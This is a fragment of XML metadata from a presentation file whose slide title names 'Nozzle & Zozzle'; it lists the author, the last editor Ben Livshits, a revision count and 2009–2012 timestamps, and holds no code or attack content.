      <vt:lpstr>Conclusions: Nozzle &amp; Zozzle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Zorn</dc:creator>
  <cp:keywords>Fall 2010 presentation</cp:keywords>
  <cp:lastModifiedBy>Ben Livshits</cp:lastModifiedBy>
  <cp:revision>275</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-06T17:30:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-01-20T21:21:47Z</dcterms:modified>
</cp:coreProperties>
</file>